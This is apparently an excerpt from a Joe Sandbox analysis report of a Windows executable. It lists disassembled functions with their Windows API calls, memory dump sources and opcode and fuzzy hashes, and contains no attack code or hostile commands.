                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8075017784f9336f0cb2e605433cba5678a8eef0bd2a1749a317f82fbc7a6c87
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E51E3A09047D53EFB3283648C55BF6BE999B45306F08888AE8D5468D2D3D8EC9CD790
                                                                                                                                                                                                                                                                              Function 007257A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00725F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 007257E3
                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0072585E
                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00725879
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0072589F
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,00725F16,00000000,?,?,?,?,?,?,?,?,?,00725F16,?), ref: 007258BE
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,00725F16,00000000,?,?,?,?,?,?,?,?,?,00725F16,?), ref: 007258F7
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                              • Opcode ID: 38565b896c079573d16f8ee39b3cf915af366003ee4a7050e9aa60944649a7ac
                                                                                                                                                                                                                                                                              • Instruction ID: 90304f834a086702cee84df745b74c072fdddef672d5d08b3f42e305dbfff099
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38565b896c079573d16f8ee39b3cf915af366003ee4a7050e9aa60944649a7ac
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A951C670A00659DFCB10CFA8E845AEEBBF8EF09310F14411AE951E7291E734AD41CF54
                                                                                                                                                                                                                                                                              Function 00713090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 007130BB
                                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 007130C3
                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00713151
                                                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0071317C
                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 007131D1
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                              • Opcode ID: 079e08525b2d0b0afc17133adcffb827873a60a75b1c87def5e19b38877b41ea
                                                                                                                                                                                                                                                                              • Instruction ID: bb2a82d00d3407ef4d98673998a3aa6313445a79e0c9441d40004d7b7ecfe08e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 079e08525b2d0b0afc17133adcffb827873a60a75b1c87def5e19b38877b41ea
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8641A134A00209EBCF10DF6CC885ADEBBB5AF45324F148155E814AB3D2D739DB95DB91
                                                                                                                                                                                                                                                                              Function 0075D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0075E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0075D7CD,?), ref: 0075E714
                                                                                                                                                                                                                                                                                • Part of subcall function 0075E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0075D7CD,?), ref: 0075E72D
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0075D7F0
                                                                                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0075D82A
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075D8B0
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075D8C6
                                                                                                                                                                                                                                                                              • SHFileOperationW.SHELL32(?), ref: 0075D90C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                                                                              • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                              • Opcode ID: a6598b1f972e91a6b2ff09c581cfcc5e2306d5e180044d6478830b88571b9169
                                                                                                                                                                                                                                                                              • Instruction ID: ec914bb3205bf65be2ba1c5afd3b9cddffc3ec4bad45571c7a790e9bd68c5fd4
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6598b1f972e91a6b2ff09c581cfcc5e2306d5e180044d6478830b88571b9169
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87415871945218DEDF26EFA4C985ADD77B8AF04341F1000EAA945E7141EB7CBB8CCB50
                                                                                                                                                                                                                                                                              Function 007642B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetInputState.USER32 ref: 00764310
                                                                                                                                                                                                                                                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00764367
                                                                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00764390
                                                                                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 0076439A
                                                                                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007643AB
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 2256411358-3772712737
                                                                                                                                                                                                                                                                              • Opcode ID: 5d309cc112cb71fcb1148009ff09d29988b6a986df21ec999a8a1e6f14e7dbd7
                                                                                                                                                                                                                                                                              • Instruction ID: 1de7de66ec7038f34de0b0f15656bd8f4d3879be34aa13a6223b0099764bb6f7
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d309cc112cb71fcb1148009ff09d29988b6a986df21ec999a8a1e6f14e7dbd7
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D931C970544385DEEB34CB75D849FB63BA8BB01304F14856DDC63D22A1E77CA886CB19
                                                                                                                                                                                                                                                                              Function 00783899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007838B8
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 007838EB
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00783920
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00783952
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0078397C
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0078398D
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007839A7
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                              • Opcode ID: bf9362e42b2e14b0d00011dafc65b5a5525e98daad8543b059a5bd4aa6b0ee77
                                                                                                                                                                                                                                                                              • Instruction ID: 3478a2997a4f33db3e765564ff551f55bb0fbebc98810ca613be3c073edd493f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf9362e42b2e14b0d00011dafc65b5a5525e98daad8543b059a5bd4aa6b0ee77
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35314430784245AFDB21AF4CDC88F2437A1FB8AB24F1442A4F5109B2B2CBB8BD41DB05
                                                                                                                                                                                                                                                                              Function 0075808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007580D0
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007580F6
                                                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 007580F9
                                                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00758117
                                                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00758120
                                                                                                                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00758145
                                                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00758153
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                              • Opcode ID: 463bca8f2dd57763e1a47fc149dba443444fc0fae6564779706e6b150d92ae4a
                                                                                                                                                                                                                                                                              • Instruction ID: 7e6d1264f304792cce968cdf29768fd0de7a007294ea9df72e0421510556b737
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 463bca8f2dd57763e1a47fc149dba443444fc0fae6564779706e6b150d92ae4a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E21B77260021DAFDF50DFA8DC88CFA73ACEB093617108525FD05DB290DAB8DC468B65
                                                                                                                                                                                                                                                                              Function 00758164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007581A9
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007581CF
                                                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 007581D2
                                                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32 ref: 007581F3
                                                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32 ref: 007581FC
                                                                                                                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00758216
                                                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00758224
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                              • Opcode ID: 8e56cfc14e34f2dfe0bf33678dfdcd1b6db06bae31641a25b4afe96b03a942da
                                                                                                                                                                                                                                                                              • Instruction ID: 15c567970c65a92d48ced759ab288403c0db63315e46d5f636615c4e50b370b6
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e56cfc14e34f2dfe0bf33678dfdcd1b6db06bae31641a25b4afe96b03a942da
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64217471600508BF9B509BA8DC89DEA77ECFB09361B148125FD05DB2A0DAB8EC45CB65
                                                                                                                                                                                                                                                                              Function 00760E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00760E99
                                                                                                                                                                                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00760ED5
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                              • String ID: nul
                                                                                                                                                                                                                                                                              • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                              • Opcode ID: 39850bcff0eb923fa1263cda00dafca56996dad16a13deb27602c3ada9b5a362
                                                                                                                                                                                                                                                                              • Instruction ID: 98868a0b0bc6fa635222a50b6d0849ab4ce5781a2866f7b502fd175c12400a7a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39850bcff0eb923fa1263cda00dafca56996dad16a13deb27602c3ada9b5a362
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A217F7050030AAFDB309F68DC04E9B77A8BF54720F204A59FCA6E72D0D7759844CB90
                                                                                                                                                                                                                                                                              Function 00760F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00760F6D
                                                                                                                                                                                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00760FA8
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                              • String ID: nul
                                                                                                                                                                                                                                                                              • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                              • Opcode ID: 932a0ad5ff5872d2e71a5f421365f594ade3d7c3c69fac6d90bae51cc7e2c2e2
                                                                                                                                                                                                                                                                              • Instruction ID: fe08753c625423101c05285835c384172c7bee114505018a1e21f9f0e0720ee5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 932a0ad5ff5872d2e71a5f421365f594ade3d7c3c69fac6d90bae51cc7e2c2e2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D218171600345DBDF308FA89C09A9A77A8BF55720F344A19FCA2E32D0E7789880DB50
                                                                                                                                                                                                                                                                              Function 00784B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006F78B1
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7873: GetStockObject.GDI32(00000011), ref: 006F78C5
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 006F78CF
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00784BB0
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00784BBD
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00784BC8
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00784BD7
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00784BE3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                              • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                              • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                              • Opcode ID: f85b91bdd89ba1efcefd666ce094c0a50ffd57c81ee30a992f78f0f7cb5877b9
                                                                                                                                                                                                                                                                              • Instruction ID: a9b5922a072c0b223ed01805fe6105c8f0c152a09868bb917868758e3a56d594
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f85b91bdd89ba1efcefd666ce094c0a50ffd57c81ee30a992f78f0f7cb5877b9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC1186B155021EBEEF119F65CC85FE77F9DEF08798F014111BA18A6090CA75DC21DBA4
                                                                                                                                                                                                                                                                              Function 00756078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _memcmp
                                                                                                                                                                                                                                                                              • String ID: j`u
                                                                                                                                                                                                                                                                              • API String ID: 2931989736-4287855088
                                                                                                                                                                                                                                                                              • Opcode ID: dcd69f412060586ba97ddd78fff4b9fa5cc95ccc5ac11bec68fb74a3b9fb5f90
                                                                                                                                                                                                                                                                              • Instruction ID: c6c7f5d347275bb2b799d6afbb3e21badecbeebf3a2021ee3843a2fbe0962108
